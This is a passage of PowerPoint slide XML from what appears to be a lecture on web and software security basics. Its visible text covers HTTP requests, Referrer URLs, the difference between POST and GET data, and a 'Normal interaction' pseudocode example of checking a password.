          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6505387" y="176618"/>
            <a:ext cx="11373227" cy="6429057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="207" name="Screen Shot 2014-02-18 at 3.20.48 AM.png" descr="Screen Shot 2014-02-18 at 3.20.48 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940517" y="7032183"/>
            <a:ext cx="18502965" cy="5828080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="210" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3215402" y="11501091"/>
            <a:ext cx="17160273" cy="1666876"/>
            <a:chOff x="1713907" y="1227564"/>
            <a:chExt cx="17160272" cy="1666875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="Referrer URL: the site from which this request was issued."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8592091" y="1227564"/>
              <a:ext cx="10282089" cy="1666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lgn="l">
                <a:defRPr b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Referrer URL: the site from which</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>this request was issued.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="209" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1713907" y="2068096"/>
              <a:ext cx="6446356" cy="480751"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18545"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180157029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P spid="21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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1862398" y="6622413"/>
            <a:ext cx="2301368" cy="1362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000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13238359" y="2999413"/>
            <a:ext cx="5407280" cy="1362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000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Shape 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9248501" y="5253525"/>
            <a:ext cx="14903385" cy="6594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846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>print “Password?” to the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>read input into variable X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if X matches the password then log in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="846666" indent="-846666" algn="l">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:defRPr sz="4800">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>else print “Failed” to the screen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286108" y="8677152"/>
            <a:ext cx="1453947" cy="1146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6600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>X =</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3922359" y="8615240"/>
            <a:ext cx="3613142" cy="1270001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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27" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4135712" y="8747052"/>
            <a:ext cx="2350493" cy="90477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4800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>abc123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793896" y="5361795"/>
            <a:ext cx="1333501" cy="755412"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 32000"/>
              <a:gd name="adj2" fmla="val 107597"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="329" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473081" y="610739"/>
            <a:ext cx="7624785" cy="5470783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079443" y="1191830"/>
            <a:ext cx="3867278" cy="1057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6000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="47394"/>
                    <a:satOff val="-25753"/>
                    <a:lumOff val="-7544"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Shape 331"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079443" y="2150338"/>
            <a:ext cx="2739518" cy="1057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6000">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>abc123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Shape 332"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079443" y="3151813"/>
            <a:ext cx="2230502" cy="1057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6000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="47394"/>
                    <a:satOff val="-25753"/>
                    <a:lumOff val="-7544"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Failed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Shape 333"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12598925" y="8264402"/>
            <a:ext cx="1086740" cy="19716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12000">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9762210" y="625078"/>
            <a:ext cx="14390485" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Normal interaction</a:t>
            </a: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28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="328"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32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330"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="50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0.000000 0.000000 L -0.000126 0.115368" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="328"/>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type="lt">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="331"/>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grpId="5" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.000126 0.115368 L -0.000000 0.230737" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="328"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="18" presetClass="entr" presetSubtype="6" fill="hold" grpId="7" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="strips(downRight)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33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xit" presetSubtype="6" fill="hold" grpId="8" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="strips(downRight)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.000000 0.230737 L 0.000000 0.346105" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="328"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="10" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="332"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="44"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5" animBg="1" advAuto="0"/>
      <p:bldP spid="328" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="330" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="331" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="332" grpId="10" animBg="1" advAuto="0"/>
      <p:bldP spid="333" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="333" grpId="8"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2" name="Screen Shot 2014-02-18 at 11.54.24 AM.png" descr="Screen Shot 2014-02-18 at 11.54.24 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3213424" y="3330773"/>
            <a:ext cx="16359188" cy="7054454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="HTTP POST requests"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387452" y="602178"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>HTTP POST requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Posting on Piazza"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9415152" y="2514239"/>
            <a:ext cx="555369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Posting on Piazza</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="217" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3466796" y="9888117"/>
            <a:ext cx="16166465" cy="1652363"/>
            <a:chOff x="279979" y="2817191"/>
            <a:chExt cx="16166464" cy="1652361"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="215" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="519316" y="2817191"/>
              <a:ext cx="15893088" cy="480752"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18545"/>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216" name="Explicitly includes data as a part of the request’s content"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="279979" y="3564678"/>
              <a:ext cx="1616646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a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Explicitly includes data as a part of the request’s content</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="220" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8176380" y="3986191"/>
            <a:ext cx="10648952" cy="1666876"/>
            <a:chOff x="4631825" y="1998669"/>
            <a:chExt cx="10648951" cy="1666875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="218" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4631825" y="2817191"/>
              <a:ext cx="3450055" cy="480752"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18545"/>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219" name="Implicitly includes data as a part of the URL"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8597402" y="1998669"/>
              <a:ext cx="6683376" cy="1666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lgn="l">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Implicitly includes data</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>as a part of the URL</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162005943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advAuto="0"/>
      <p:bldP spid="220" grpId="0"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 name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840279" y="3473911"/>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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14906248" y="3473911"/>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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Client"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769697" y="2385605"/>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226" name="Server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15729938" y="2385605"/>
            <a:ext cx="19900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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="229" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9419239" y="3698308"/>
            <a:ext cx="5545523" cy="1115057"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="5545522" cy="1115056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="227" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1118033"/>
              <a:ext cx="5545523" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="152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228" name="HTTP Request"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="648051" y="2976"/>
              <a:ext cx="4249421"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HTTP Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="User clicks"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5904276" y="6336248"/>
            <a:ext cx="350948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User clicks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Responses contain:…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043393" y="8076390"/>
            <a:ext cx="16297215" cy="397089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pPr marL="493888" indent="-493888" algn="l" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Responses</a:t>
            </a:r>
            <a:r>
              <a:t> contain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="851284" lvl="1" indent="-495684" algn="l" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3680"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Status</a:t>
            </a:r>
            <a:r>
